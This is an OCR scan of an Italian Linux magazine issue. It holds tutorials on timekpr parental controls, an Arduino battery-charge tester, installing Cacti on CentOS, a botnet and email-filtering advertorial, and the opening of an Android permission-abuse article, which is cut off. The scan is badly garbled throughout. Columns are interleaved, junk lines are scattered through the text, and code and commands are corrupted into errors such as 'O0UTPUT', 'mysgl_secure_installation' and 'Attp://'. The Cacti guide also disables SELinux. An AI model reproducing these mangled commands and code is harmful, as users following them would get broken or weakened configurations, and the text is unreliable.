IVIPTEMIORZME ARE VASETTI ROIO OR e 


LIMITI DI TEMPO 
01 Se l'utente deve accedere al proprio account soltanto 
per un certo periodo di tempo, ogni giorno, spuntiamo 
la voce Limit Access Duration e impostiamo i minuti in Every Day. 
Iltempo verrà conteggiato dall'accesso tramite schermata di login. 


timekpr 


Selectuser | mario ni 


VINCOLI ORARI 

03 Può essere importante limitare anche il tempo di 

accesso in determinati orari della giornata. Basta 

spuntare Limit Time Frame e inserire l'ora di inizio in from e 

l'orario limite in to. Come nel caso precedente, possiamo dare 
orari differenti per ogni giorno della settimana. 


Status for figlio 


Able to login all daytoday: 
(Also active bypass) 


Limited by access duration (any day): a Rese! 
Limited by time frame (any day): 


E " 


282 minutes | 


Account locked: a 


Time left: 


ICEEPTPLNISIATMOPTE TOO ATEI TOTOPTITATTOCIBAZA DITIDESIRII PITTI RENI DIA TOVITAGRE LORI TISTTA TESTINE TRAE ARTAT 
Ù 


BLOCCHI RAPIDI 
05 Dal pannello Status è possibile effettuare un blocco ra- 
pido con Lock account; evitare l'applicazione dei limiti 
nel giorno specifico con Bypass for Today e, infine, offrire/togliere 
qualche minuto di bonus di utilizzo con Add time reward/penality. 


É 
preromana enna 


Sun Mon Tue Wed 


minutesl 300 _[[100 j:{co_\z|100, 
Mon 


ry day Wed 


Tue 


from! ii? n 
to 


i 
' 
CS OI nt 


WEEK-END LIBERO! 


02 Non tutti i giorni sono uguali: durante la settimana è 

importante dedicare del tempo allo studio, mentre nel 
week-end potremo lasciare più di tempo a disposizione. Spuntiamo 
Configure per Day e impostiamo ogni singolo giorno. 


tatus | Limits & Boundaries | 


 ELimit access duration Sun Mon Tue 


& configure per day 


& îELimit time frame 


LIMITI COMBINATI 

04 Dopo aver effettuato le scelte temporali, salviamo- 

le con Applica. L'uso combinato di limiti di tempo e 

orari consente di vincolare l’uso del PC per un tempo massimo 

in una determinata fascia oraria. Possiamo verificare il tempo 
residuo disponibile nel pannello Status. 


A} (00:03) f4 [I] E ) 18:44 WE 


Timekpr notification 


mess © «Youbhave 3 minutes left 


TUTTO PRONTO! 


06 Effettuiamo l'accesso dall’account limitato per vedere 

una nuova icona in alto a destra che che mostra iltempo 

residuo di utilizzo. Allo scadere, la sessione verrà terminata. Ogni 
nuovo tentativo di accesso andrà in fumo! 
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ask er Ea =D 


“Quant'è carica 


Ila batteria?” 


Realizziamo con Arduino un sistema che ci permette di controllare 
la carica di qualsiasi batteria. E tutto semplice! 


e batterie alcaline sono probabilmente l’oggetto più acquistato di 

tutti i tempi: telecomandi, orologi, radio FM portatili, giocattoli 

hanno tutti bisogno di un po’ di energia per poter funzionare 
correttamente. Fortunatamente, però, esistono anche delle versioni 
ricaricabili che, a differenza delle usa e getta, sono sempre più utilizzare. 
Ma se volessimo monitorare lo stato di carica di una qualsiasi batteria stilo? 
In commercio esistono dei dispositivi che ci permettono di farlo. Ma, da 
veri maker, possiamo realizzarne uno in casa a costo zero, a patto di avere, 
ovviamente, una scheda Arduino. Oltre alla scheda di prototipazione, 
infatti, ci occorrono solo una manciata di LED e resistenze: Arduino a 
parte, una spesa che si riduce a qualche centesimo di euro. Il progetto che 
realizzeremo è abbastanza semplice: come si può notare dallo schema in 
Fig. 1, 3 LED di differente colorazione (rosso, giallo e verde) verranno 
collegati ad Arduino; in base al livello di carica della batteria stilo collegata 
al circuito si accenderà il giusto LED (rosso se scarica, verde se carica, 
gialla se mediamente carica). Ma è arrivato il momento di passare dalla 
teoria alla pratica. Tuffiamoci subito in questa nuova avventura e scopriamo 
in anticipo se sta per arrivare il momento di cambiare le batterie! 


REX ZTEZTZZTERZZZZEZZZIIERETEZ] 
desse corde sese cessa cesso 


serssseorsone 


NA Battery 


fritzing 


® Fig. 1° Ecco lo schema di collegamento su breadboard 
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Il codice completo lo trovi su: www.edmaster.it/url/6944 


SCHEMA Di COLLEGAMENTO 


I pin di Arduino da utilizzare sono, almeno nel nostro test, 8, 9 e 
10, fra i digitali, e AQ fra gli analogici. Ai primi 3 vanno collegati 
i LED di cui abbiamo parlato in precedenza: ricordiamoci che, al 
fine di evitare eventuali guasti sui LED utilizzati, è sempre bene 
utilizzare una resistenza di protezione. E il pin analogico A0? A 
questo deve essere collegato il positivo della batteria da verificare: 
l’ATMega328 dell’ Arduino, in base al nostro sketch, si occuperà 
di convertire il segnale analogico (i Volt della batteria) in digitale 
facendo accendere poi il giusto LED. Tra il positivo della batteria e il 
pin AQ, però, è necessario porre una resistenza da 10 kOhm. A cosa 
serve? In gergo tecnico, questo resistore viene detto di pull-down 
ed ha uno scopo importante: quello di eliminare eventuali disturbi 
provenienti dalla batteria. È dunque evidente, al fine di ottenere 
una valutazione corretta della carica della batteria stilo, come sia 
importante non sottovalutare il collegamento di tale resistore. 
Come già anticipato, lo schema di collegamento è evidentemente 
molto semplice: proprio per la sua semplicità possiamo prototipare 
il tutto in pochi secondi utilizzando una comunissima breadboard; 
ma i più esigenti potranno realizzare un circuito stampato e creare un 
dispositivo più comodo da utilizzare o portare in giro ogniqualvolta 
ce ne sarà bisogno. 


LO SKETCH 


Chiunque abbia già sviluppato qualcosa con Arduino, saprà già che 
la prima cosa da fare è la dichiarazione delle variabili: 


int carica; 

int Rosso=8; 
int Giallo=9; 
int Verde=10; 


Anzitutto ne creiamo una che ci tornerà utile per memorizzare 


il valore analogico convertito in digitale. Poi, ovviamente, 
dichiariamo 3 differenti variabili che identificano i corrispondenti 3 
LED collegati ad Arduino. Queste ultime 3 variabili devono essere 
poi dichiarate come uscite, dunque: 


void setup() 
{ 
pinMode(8,OUTPUT); 
pinMode(9,OUTPUT); 
pinMode(10,O0UTPUT); 
} 


Ma ritorniamo un secondo alla variabile carica dichiarata ad apertura 
dello sketch. Abbiamo già detto che ci servirà per memorizzare un 
valore convertito da analogico a digitale. I più informati sapranno 
già che Arduino lavora a 5 V. Di conseguenza, riusciremo a leggere 
solo i valori compresi tra 0 e 5 V. Traducendo ciò in bit, riusciremo a 
leggere tutti i valori che vanno da 0 (0 V) a 1023 (5 V). Se la batteria 
(o le batterie) da verificare hanno una tensione massima di 5 V è 
tutto semplice. Ma se volessimo controllare una stilo da 1,5 V ad 
esempio? Basta un semplice calcolo matematico: dividiamo 1023 
per 5 V e moltiplichiamo il risultato ottento per i Volt della batteria. 
Dunque, sempre nel caso di una batteria da 1,5 V, la tensione 
massima equivarrà ad un valore pari a 307. Teniamo ben a mente 
questa semplice formula matematica perché a breve ci servirà per 
personalizzare il codice dello sketch a seconda delle nostre esigenze. 


void loop() 
{ 
delay(100); 
carica=analogRead(0); 
if (carica>265) 
{ 
digitalWrite(Rosso,LOW); 
digitalWrite(Giallo,LOW); 
digitalWrite(Verde,HIGH); 


Diciamo ad Arduino di andare a leggere il valore (analogico) al 
pin A0, che corrisponde alla variabile carica precedentemente 
dichiarata. Se questo valore è superiore a 265 allora il LED di 
colore verde si accenderà per indicare che la batteria è carica. 
Ma a cosa corrisponde 265? Nel caso del test di una batteria da 
1,5 V corrisponde al valore convertito di 1,3 V, un valore ancora 
sufficiente per far sì che la batteria utilizzata nei nostri test venga 
considerata carica. 
if ((carica<265)&&(carica >=164)) 
{ a 

digitalWrite(Rosso,LOW); 

digitalWrite(Giallo,HIGH); 

digitalWrite(Verde,LOW); 


Analogamente al ciclo utilizzato per verificare la carica completa 
della batteria, nel caso in cui il valore letto al pin A0 e memorizzato 


nella variabile carica abbia un valore compreso tra 265 e 164 
(ovvero 1,3 V e 0,8 V), facciamo sì che si accenda il solo LED 
giallo ad indicare una carica media e dunque una sostituzione quasi 
imminente della batteria. 


if (carica<164) 
{ 
digitalWrite(Rosso,HIGH); 
digitalWrite(Giallo,LOW); 
digitalWrite(Verde,LOW); 


Infine, se il valore rilevato è inferiore a 164 (come già detto, 0,8 
V) accendiamo il LED rosso ad indicare che la carica della batteria 
collegata è troppo bassa e che è certamente il caso di procedere alla 
sostituzione o, se possibile, alla ricarica. 


CONCLUSIONI 


Come abbiamo avuto modo di scoprire, questo progetto Arduino 
è semplice non solo dal punto di vista dei collegamenti, ma anche 
lato codice. Alla fine, infatti, si tratta di 3 semplici cicli che, in base 
al valore rilevato, consentono di accendere il giusto LED. L’unica 
difficoltà, se così vogliamo definirla, sta nel tarare lo sketch a seconda 
delle proprie esigenze. Utilizzando il codice di test, infatti, è possibile 
ottenere un risultato esatto solo nel caso in cui venga collegata una 
batteria stilo da 1,5 V. Resta ovvio, dunque, che è il caso di cambiare 
i valori della variabile carica a seconda della batteria (o delle batterie) 
che vogliamo verificare. I più audaci potranno però espandere questo 
progetto che, come sempre, è solo un punto di partenza: si può infatti 
pensare di collegare diversi pulsanti ad Arduino che attivano diversi 
“profili”: ad ogni profilo corrisponde una diversa batteria (da 1,5 e da 
3 V ad esempio) in modo tale da evitare di mettere mano al codice 
ogniqualvolta vorremo verificare batterie che hanno tensioni dichiarate 
differenti. Come al solito, per qualsiasi dubbio o chiarimento è possibile 
fare riferimento al forum di Linux Magazine che, lo ricordiamo, ha un 
nuovo indirizzo: Atp://linux-magazine.edmaster.it. 
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1 lavoro del sistemista è carico di molte 
responsabilità. Il suo ruolo è anche quello di 
monitorare le risorse presenti in una rete, il 
carico su ogni macchina, la banda, le temperature, 
i processi attivi, ecc. Ciò consente di adeguare le 
risorse, capire chi e cosa ne abusa, identificare un 


IL KIT DEL 
PERFETTO 
SISTEMISTA 


Cacti ci fa dormire sonni tranquilli monitorando qualsiasi 
server. Ecco come installarlo e configurarlo su CentOS 


È impostante dunque servirsi di tool di analisi 
efficienti. E fra quelli disponibili, Cacti è quello più 
apprezzato. Si tratta di un potentissimo software in 
grado di estrapolare grafici relativi allo stato di ogni 
risorsa presente in una rete in modo estremamente 
rapido ed efficiente. Inoltre, può essere esteso grazie 


Thold che permette di impostare delle soglie su 
ogni servizio e avvisare l'amministratore di rete al 
loro superamento o Syslog che consente di salvare 
tutti i log di sistema delle macchine presenti nella 
rete. E in queste pagine scopiremo come installare 
e configurare correttamente Cacti su un server 


guasto o adeguare un sistema a nuove esigenze. 


root@localhost mariobonofiglio)tt yum update 
Plugin abilitati:fastestmirror 


Prima di procedere all’installazione di Apache e 

Cacti dobbiamo verificare che il nostro sistema sia 
aggiornato. Colleghiamoci via SSH al nostro server e aggior- 
niamo il tutto con il comando yum update. 


te/httpdcon 


lt be turned off when 
tI stems or if 
ti broken on yo 

it if 

Ù] 

WEnableMMAP off 
EnableSendfile on 


erving from networked-mounted 
rt for these functions is otherwise 


EnableMMaP On, EnableSendfile Off 


Hi Supplemental configuration 
i 

# Load config files in the “ 
IncludeOptional conf .,d/*.conf 


etcr-httpd/conf.d' directory, if any 


Modifichiamo la configurazione lanciando nano /etc/ 

httpd/conf/httpd.conf- prendendo come riferimento il 
file scaricabile dall'indirizzo www.edmaster.it/url/6945: serve a 
reinderizzare le richieste HTTP verso Cacti. 
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ad un'infinità di plugin: fra i più famosi troviamo 


equipaggiato con CentOS. 


udo.x86_64 B:1.8 
ystemd 
uystemd-lib 


xBb_64 Bic 
6_64 B 


vim-minimal.x 
wpa_supplicant.x86_6 
xfsprogs.x86_64 B:1.5 


omple 
[rootBlocalhost mariobonofigliolt- yum install httpd nano 
"Plugin abilitat 
Loading mirror 


astestmirror 
pecds from cached hostfile 


Successivamente, installiamo il software Apache 

con yum install httpd nano che si occuperà di instal- 
lare il web server e l'editor di testo nano che ci servirà per 
modificare le configurazioni di Apache e PHP. 


Installaz 


n in 
inc ti 
in esp: aproutil-1 
Verifica in € : httpd-too 
Verifica in corse nano-2.3 
Verifica in httpd-2 
Installato 


httpd.x n° HA 1-45 .el7?.centos nano .x96_64 B:2.3. 


Di iden 


Per avviare manualmente Apache lanciamo ser- 

vice httpd start e systemctl enable httpd che creerà 
un collegamento simbolico per l'avvio automatico di Apache 
all'accensione del sistema. 


È il momento di PHP e MySQL 


L'installazione di PHP deve essere effettuata 

tramite un repository esterno, Webtatic, che a 
sua volta necessita di Epel. Pertanto, lanciamo yum install 
epel-release e in seguito yum update per aggiungere il 
repository Epel al sistema. 


Dunque lanciamo yum -y install php71w php71w- 

snmp php71w-mysgli php71w-cli php71w-ldap 
php71w-xml php71w-session php71w-sockets php71w-pcre 
php71w-gd php71w-dom php71w-posix php71w-mbstring 
per installare PHP 7.1. 


Gacti salva ogni dato raccolto su un database: installiamo tutto il necessario 


A questo punto è necessario aggiungere il 

repository di Webtatic con il comando rpm 
-Uvh htips://mirror.webtatic.com/yum/el7/webtatic-release. 
rpm e lanciamo nuovamente yum update per aggiornare 
la lista pacchetti. 


Una volta installato PHP 7.1 modifichiamo il 

file di configurazione php.ini con il comando 
nano /etc/php.ini e aggiungiamo la stringa Europe/ 
Rome alla riga date.timezone = per impostare il fuso 
orario del server. 


Installiamo MariaDB Server con il comando yum 

install mariadb mariadb-server. Come visto in 
precedenza, configuriamo l'avvio automatico e avviamo il server 
con service mariadb start e systemctl enable mariadb. 


Infine, lanciamo l'installazione con mysgl_secure_ 

installation. Impostiamo la password di root per 
MySQL e rispondiamo con Ya tutte le domande che ci verranno 
poste, ad esempio la rimozione del DB di test o l'accesso anonimo. 
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MySQL: configurazione perfetta 


II DB deve essere adeguato alle esigenze di Cacti per poter salvare i dati raccolti 


Per configurare il nostro server MySQL accediamo alla Passiamo alla creazione dell'utente con il comando 

console con mysql -u root -p e inseriamo la password CREATE USER ‘cactiuser’fa’localhost’ IDENTIFIED BY 
di root. Dunque, lanciamo il comando CREATE DATABASE cacti;. ‘passwordscelta’; avendo cura di modificare il campo password 
Riceveremo un messaggio di conferma di avvenuta creazione. con una a nostra scelta. 


L'utente appena creato deve poter accedere ad Ora, usciamo dalla console con EXIT; e come 

ogni campo sul database, quindi usiamo GRANT visto per PHP anche qui ricaviamo una tabella 
ALL PRIVILEGES ON cacti.* TO ‘cactiuser’fa’localhost’; per di timezone perché Cacti possa accedervi. Usiamo dunque 
garantirne l’accesso. Per confermare le modifiche attuate mysql_tzinfo_to_sql /usr/share/zoneinfo | mysql -u root 
usiamo FLUSH PRIVILEGES;. -p mysql. 


Ora torniamo sulla console MySQL con mysql Aggiorniamo i privilegi con FLUSH PRIVILEGES; e 

-u root -p e usiamo-GRANT SELECT ON mysql. usciamo con EXIT; e se abbiamo seguito alla lettera 
time_zone_name TO ‘cactiuser’fa’localhost’; per garantire tutti i passi, il nostro DB è stato configurato correttamente. Tenia- 
l'accesso tramite query SELECT alla tabella appena creata. mo traccia del nome utente e della password, a breve serviranno. 
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L'installazione di Cacti è un'operazione molto Rechiamoci ora nella directory di Apache con 

semplice ma prima dobbiamo lanciare il cd /var/www/html e digitiamo wget Attp:// 
comando yum install rrdtool net-snmp net-snmp-utils per www.cacti.neY/downloads/cacti-latest.tangz per scaricare il 
installare il pacchetto net-snmp, necessario per il corretto pacchetto dell'ultima release disponibile di Cacti. Infine, 
funzionamento di Cacti. scompattiamolo con tar xzvf cacti-latest.tar.gz. 


GNU nano 2.3. 


pre 
iggregate grap 


about php 


Rinominiamo la cartella con mv cacti-1.1.12/ cacti/ e Per configurare il pacchetto di Cacti cosicché abbia 

entriamo nella cartella con cd cacti/. Lanciamo il co- accesso al DB lanciamo nano include/config.php e 
mando mysgql cacti € cacti.sql -u root -p per popolare i campi delDB —modifichiamo il campo username e password con quelli scelti in 
Cacti creato in precedenza (usando il DB di esempio fornito da Cacti). precedenza (durante la configurazione iniziale di MySQL). 


“File: zete/selinixconfig | |''|U Modificato 


Disabilitiamo SELINUX con il comando setenforce 


Infine, configuriamo il firewall e i permessi 0 e modifichiamo la voce SELINUX in disabled 
di accesso. Digitiamo firewall-cmd --zone=public nel file nano /etc/selinux/config. Infine, lanciamo chown -R 
--permanent --add-service=http e firewall-cmd --reload apache:apache /var/www/html/cacti per rendere l'utente 
per consentire le richieste HTTP sulla porta 80. Apache proprietario della cartella Cacti. 
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Messa a punto di Cacti 


Non basta fornire i dati di accesso, ma dobbiamo configurare anche l'interfaccia 
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L’IP DEL SERVER 

Per configurare Cacti apriamo un browser e 

raggiungiamo l'indirizzo IP del nostro server CentOS. 
Se non sappiamo quale sia lanciamo nmcli dev show. Dunque 
visitiamo l'indirizzo http:/ipservercentos/cacti. Apparirà la licenza 
d'uso del software. Accettiamola! 
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AGGIUNGIAMO I MODULI 

Per adeguare le variabili MySQL basta accedere 

all'interfaccia con mysql -u root -p e lanciare 
SET global variabile=nuovovalore;. Per i campi read-only, 
invece, lanciamo nano /etc/my.cnf e inseriamo variabile = 
nuovovalore sotto il campo mysqld. Riavviamo MariaDB con 
service mariadb restart. 
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I PATH DEI PACCHETTI 

In questa pagina possiamo vedere quali sono 

i pacchetti usati da Cacti e i relativi path. Se 
qualcuno di questi fosse in rosso-dovremo provvedere a 
installarlo o a settare il path corretto, generalmente /usr/ 
bin/nomepacchetto. 
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Nella pagina successiva ci verranno presentati i 
requisiti minimi di sistema per il funzionamento 
di Cacti. Sulla destra, il nostro sistema e, sulla sinistra, i 
requisiti: se tutti i campi sono in verde e non è presente la voce 
No possiamo proseguire. 
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CHE TIPO DI SERVER? 

La pagina successiva ci chiede se vogliamo 

configurare un New Primary Server. Come 
possiamo notare, la pagina riporta anche i dati di accesso 
al database che abbiamo modificato precedentemente. 
Se qualcosa fosse errato, ci toccherà modificare nuova- 
mente il file config.php. 


TUTTO PRONTO! È 

Proseguendo, una pagina mostrerà i permessi 

delle cartelle. E, infine, eccoci all'ultima pagina di 
configurazione, scegliamo il template Local Linux Machine e 
completiamo l'installazione con Finish. Ci troveremo di fronte 
alla schermata di Login di Cacti. 


Spine: una marcia in più a Cacti I 


inte ost cacti li wqe 


Per installare Spine, non incluso nei repository, 

entriamo nella cartella /tmp con cd /tmp e sca- 
richiamo i sorgenti con wget Attps:/www.cacti.ne/downloads/ 
spine/cacti-spine-latest.tar.gz. ALtermine, scompattiamo il con- 
tenuto con tar zxvf cacti*. 


GNU nano 2.3.1 


t_ 12 
} Database 


User cactiuser 


cacti 


ì_ Password passuordscelta 


Port 3396 


Usiamo make e make install per compilare e 

installare Spine. Con il comando nano /etc/spine.conf 
creiamo il file di configurazione di Spine e inseriamo al suo interno 
l'indirizzo dell'host e i dati del DB così come nel file reperibile alla 
pagina Web www.edmaster.it/url/6945. 


General: Paths. Device Delautts \Puller. Data Storage Visual Authentcaton Data Scurce Satistzs  Perirmance Sphes MabR. 


Tomplatis Data Collection Enabled {2 Data collecton Enabi 
Ifyou wish to stop the polling process completely, uncheck this box 
Poller Type spine . 
The poller type to use. This setting will take effect at next polting Interval. cma.php 
Polier Interval spine } Minuti - 


The polling interval in use, This setting will effect how often RRDfiles are checked ari 120, NOTE: If 
valu Must re-populate the poller cache. Fallure to do $0, may result in lost data, 


Cron interval - Every 5 Minutes 
The cron interval in use, You need io set his setting 10 de interval al your cron or scheduled task is 

currentiy running 

Maximum Concurrent Poller Processes 1 

The number of concuirent processes fo execute, Using a higher number when using cmd.php will Improve 


perlormance Performance Improvements In spine are best resolved with the threads parameter 
Balance Process Load LI Balance Process Loai 


Iyou choose this option, Cact will allempt to balance the load ol each poller process by equaliy distributing 
poller items per process. 


BE CORE ia 
Pi DE HE 


wr 


Dal menu a sinistra troviamo la voce Settings 

e nella nuova pagina che appare scegliamo 
Poller per selezionare Spine al posto di com.php. Da ora 
in poi potremo beneficiare dei vantaggi di Spine e orga- 
nizzare i nostri grafici. 


Installiamo il poller Spine, ben più efficiente di quello standard 


i-spine 


Installiamo i pacchetti necessari alla compilazione 

con yum group install “Development Tools” ed 
entriamo nella cartella dei sorgenti con cd cacti/. Lanciamo 
aclocal, seguito da libtoolize --force, autoheader, autoconf, 
automake e ./configure. 


User Login 


Username | admin 
Password | srermee 


(I keep me signed in 
Login 


lid User 1 


Accediamo al pannello di Cacti inserendo admin 

sia come username sia come password. Entrando 
ci verrà chiesto di inserirne una nuova, inseriamone una con 
almeno un carattere speciale al suo interno e giungeremo alla 
schermata principale del software. 


Nella pagina Device possiamo vedere il server di 

Cacti come Local Machine e, al suo interno, possiamo 
scegliere di usare il procollo SNMP v2 e assegnare dei grafici o 
crearne di nuovi. Senza di essi l'interfaccia rimarrà disabilitata. | 
grafici sono disponibili in Graphs. 
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‘annacry, il ransomware che ha ter- 
rorizzato l'ecosistema Windows, è 
solo l’ultimo dei virus ad aver rice- 


vuto forse una copertura mediatica spropositata 
rispetto ai reali disagi provocati — a posteriori 
abbastanza limitati. Una minaccia ben più seria 


BOTNET: © 
UNA MINACCI 
PIÙ GRANDE 
DEI RANSOMWARE 


Negli ultimi mesi si è parlato soprattutto di ransomware. 
Ma il vero pericolo per il Web e i dispositivi connessi 
alla Rete sono le botnet. Ecco come difendersi 


e della quale si dovrebbe parlare più spesso è in- 
vece quella rappresentata dalla cosiddette bot- 
net, reti di computer (ma non solo) controllati da 
un singolo individuo detto botmaster, in parole 
più semplici l’hacker che conduce varie opera- 
zioni illegali online. Le botnet sono utilizzate 


Hosting 
solutions 


out of the DOX 


ibra ESVA shared email 
+ di Hosting Solutions 


tanti 


dai malintenzionati per diverse “attività”: attac- 
chi DDoS, campagne spam e/o ransomware, in- 
gannare i network di advertising “gonfiando” il 
numero di visite/impressioni, sfruttare le risorse 
dei computer controllati per fare mining (risol- 


vere complessi calcoli matematici per accumu- 


Filtri Libra ESVA: protezione massima 


Ecco come acquistare il servizio dal provider italiano Hosting Solutions 


| PACCHETTI DISPONIBILI 
0 Il provider Hosting Solutions mette a disposizione dei 
clienti 3 differenti pacchetti visibili sulla pagina Web 
www.edmaster.it/url/6941. Per il nostro test utilizzeremo il pac- 
chetto Libra ESVA shared email (5 caselle). 


Login Pannello di Controllo MasterCP 


Benvenuti in ServerMatel 
Utente ServerMate è Il pannello di controllo che 
consente di gestire tutti | servizi di 
HostingSolutions. 
Se siete un utente registrato potrete accedere 
all'area riservata in modalità sicura SSL e 
gestire tutte le funzionalità tecniche ed 
amministrative dei vostri account. 


Password 


Utente o Password MasterCP dimenticati? 
; stà 


PANNELLO DI CONTROLLO 
03 La procedura per ordinare Libra ESVA è la stessa del 
passo precedente. Una volta che il servizio sarà attivo 
accediamo al Pannello di controllo e inseriamo le credenziali ri- 
cevute in precedenza via email. 
0006 
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ACQUISTO DEL SERVIZIO 

02 Un piano hosting è indispensabile per utilizzare i fil- 
tri Libra ESVA. Abbiamo scelto il piano Silver Linux 
(www.edmaster.it/url/6942). Indichiamo il dominio da registrare/ 
trasferire e clicchiamo su Ordina. Seguiamo le istruzioni a schermo. 
tienso servi [ 


Hosting & Dedicati RT 


Servizio Dominio Scadenza -—Malntainer Auto Dettagli 
rina. 


Ubra Esva per Shared Emall 8 jayrogiti o 
prodi o FISTOMAI 


CRE LEI 


PRIMI PASSI 

Server Mate è il pannello di controllo proprietario di 

Hosting Solutions. La sezioni Hosting & Domini do- 
vrebbe essere già selezionata. Individuiamo il piano Silver Linux 
e clicchiamo sul pulsante Apri in sua corrispondenza. 


LE ARSOLI ESA SA 
lare cripto-valute come i famosi BitCoin), furto LIBRA ESV, A: i MI GLI ORI FILTRI ANTIVIRUS 
di dati sensibili (credenziali di accesso ai servizi LI 
del conto online, appropriazione d’identità nei E ANTISPAM SONO A TUA DISPOSIZIONE 


social network, ecc.). Ma i computer casalinghi Secondo il portale specializzato Virus Bul- ben 3 software antivirus: BitDefender, 


non sono l’unico bersaglio degli hacker: i web- letin, i filtri Libra ESVA sono tra i migliori —ClamAVed AVIRA. È possibile acquistare 
server ed i dispositivi “intelligenti” dell’Internet disponibili sul mercato e garantiscono vari pacchetti Libra ESVA shared email, 
delle Cose possono diventare degli inconsape- un elevato livello di protezione da spam ognuno dei quali garantisce protezione per 
voli mezzi per portare a termine le operazioni {catch rate superiore al 99,9%), campa- un numero variabile di caselle di posta. 
criminali elencate in precedenza. Scopriamo gne di phishing, malware, ransomwaree, Maggiori informazioni sono disponibili sul- 
dunque come proteggere al massimo le nostre backdoor e simili. Il servizio si avvale di la pagina Web www.edmaster.it/url/6943. 


caselle di posta elettronica. 


E-mail a prova di bomba! 


Creiamo una nuova casella di posta elettronica e blindiamola 


GESTIONE DELLE MAILBOX 


Eccoci nella sezione dedicata a Silver Linux. Individu- 

iamo il riquadro Gestione Caselle e clicchiamo sul pul- 
sante Aggiungi per creare una nuova casella. È anche possibile 
modificare la caselle postmaster presente di default - clic sulla 
matita in sua corrispondenza. 


® espandi 


Servizio Dominio 


ANTIVIRUS E ANTISPAM 

È giunto il momento di attivare i filtri Libra ESVA. Nella 

sezione Hosting & Domini del pannello di controllo clic- 
chiamo prima sul pulsante Apri (in corrispondenza del servizio) e 
successivamente sulla voce Filtri Antivirus ed Antispam. 


Aggiungi » 
Domino { Seleziona un dominio Ì 
fl Seleziona un dominio È 
è È 
Ì 
ATTIIFIPAPLEPIPIITITTIA PETIFEPFITEFAARITITSTPIITMEFTIPEFF PRI PERITIBIOFITeITEMtaST7OE maprrase eli 
SELEZIONE DEL DOMINIO 


Al centro della pagina viene visualizzata una piccola fine- 

stra di dialogo con un menu a tendina. Apriamolo e se- 
lezioniamo il dominio che abbiamo registrato/trasferito. Dopo aver 
dato conferma passeremo automaticamente allo step successivo. 


Account 
Indirizzo 
Attivo 
Nome reale 
Password 
Ripeti Password 
Catch att 

Quota Boo  — 3 
Abilita Filtri i 


5 © | 


CREIAMO UNA CASELLA 

Completiamo le caselle come mostrato nell'immagine. 

A nostra discrezione possiamo specificare anche una 
dimensione differente in MB (Quota), eventuali indirizzi per l’inol- 
tro (Forward) e gli autorisponditori. Una volta completato tutto 
clicchiamo su Applica. 


Ibra Esva per Shared Emall 5 caselle 


tia 


Fittri Antispam 
Antivirus 


Libra Esva (0 di 5 disponibili) 


Domina Caselle Attive Numero Massimo Caselle Caselle protette da Libra Esva 


peo) 


ATTIVIAMO | FILTRI 

Apparirà immediatamente una tabella (per il momento 

vuota) nella quale saranno mostrate successivamente 
tutte le caselle protette dai filtri. Clicchiamo sul pulsante Aggiungi 
per dar via alla procedura di attivazione dei filtri. 


Caselle Attive 
Numero Massimo Caselle 21 
Caselle Libra Esva Disponibili 5 il 


Numero Caselle da Attivare Borsa: si 


RETTA ATE RT TA i rane rater net 


TUTTO PRONTO! 

Ci siamo quasi. Disponendo di un pacchetto per proteg- 

gere fino a 5 caselle di posta abbiamo impostato il nu- 
mero 5 dallo slider. Clicchiamo sul pulsante Applica e attendiamo 
alcuni istanti. Complimenti, i filtri Libra ESVA sono ora attivi! 
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pesso non ci pensiamo, ma nei nostri 

smartphone e tablet ormai riponiamo 

dati estremamente importanti come fo- 

tografie private, elenchi di password e 
codici di carte di credito molto più frequentemente 
di quanto facciamo con un computer. Un sistema 
operativo mobile come Android è costruito con 
una struttura a “scompartimenti”. Un'app non può 
infatti accedere automaticamente a qualsiasi infor- 
mazione: deve richiedere dei permessi. Ad esem- 
pio, un'app che vuole utilizzare il microfono deve 
essere autorizzata. La richiesta dei permessi avvie- 
ne durante la fase di installazione: quando trovia- 
mo un'app su Google Play, al momento dell’instal- 
lazione ci viene presentata con un piccolo pop-up 
la lista dei permessi da affidare all’applicazione e 
dobbiamo confermarla per procedere. Se i per- 
messi ci sembrano troppi o ingiustificati, possia- 
mo rifiutare l’installazione dell’app. Il problema, 
ovviamente, è che ormai siamo talmente abituati 
ad accettare tutto senza leggere che la maggioran- 
za degli utenti accetta tutte le richieste di permessi 
da parte di qualsiasi app. Ed è un problema molto 
più grosso di quello che si potrebbe immagina- 
re. Ci siamo mai chiesti perché quell'app gratuita 
per il meteo chieda l’accesso non solo alla vostra 
posizione GPS (cosa perfettamente logica per le 
previsioni meteorologiche) ma anche all’account 
e-mail, al numero di telefono ed a file e cartelle? 
Perché con queste informazioni è possibile scopri- 
re non il meteo, ma le nostre abitudini ed i interessi 
personali. E quindi è più facile fornirci la pubblicità 
su misura per i nostri gusti. Queste app sono di fat- 
to strumenti di spionaggio che controllano Je nostre 
informazioni private per poi venderle alle aziende 
che si occupano di produrre e distribuire la pubbli- 


STIAMO 
ATTENTI 


A QUELL'APP! 


Alcune applicazioni Android sono in grado 
di rubare le password degli utenti. 
Come difendersi? Scopriamolo subito! 


cità. È una violazione della nostra privacy, ma è per- 
fettamente legale. Perché? Perché glielo abbiamo 
permesso: siamo stati noi a garantire all’app i vari 
permessi con cui accede alle informazioni persona- 
li, semplicemente cliccando “ok” durante l’instal- 
lazione senza nemmeno leggere. Ma c’è di peggio. 


LE FUNZIONI —_, 
DI ACCESSIBILITA 


La sottrazione di informazioni personali per utilizzi 
pubblicitari è un problema, molto affine a quello 
dei cookies dei siti Web, ma nel complesso non 
eccezionalmente grave: non ci sottraggono dena- 
ro e non minacciano la nostra vita, al massimo ci 
possono imbarazzare. Recentemente, però, i ricer- 
catori dell’università della California e del Georgia 
Institute of Technology hanno dimostrato, nel loro 
progetto chiamato Cloak&Dagger che, utilizzando 
alcuni particolari permessi, è possibile fare molto di 
più. Si tratta dei permessi di accessibilità: in infor- 
matica quando si parla di accessibilità ci si riferisce 
a strumenti che semplificano l’utilizzo di un pro- 
gramma per persone con disturbi alla vista, udito e 
tatto. Ad esempio, una persona daltonica potrebbe 
non riuscire a distinguere scritte, immagini e pul- 
santi sullo schermo di uno smartphone perché i loro 
colori sono troppo simili, quindi è necessario poter 
cambiare i colori in modo da renderli più facili da 
distinguere. Esistono diversi strumenti che Android 
offre per inserire nelle proprie applicazioni un aiu- 
to a persone con qualche tipo di disabilità. Uno dei 
permessi di accessibilità più spesso richiesti dalle 
applicazioni Android si chiama in gergo tecnico 
SYSTEM_ALERT_WINDOW e permette la so- 
vrapposizione di un livello trasparente sopra un’al- 


Fig. 1 e Ecco un esempio di 
sovraimpressione che sfrutta le 
funzionalità di accessibilità 


tra applicazione. Per fare un esempio pratico, si può 
creare una applicazione che, una volta aperta non 
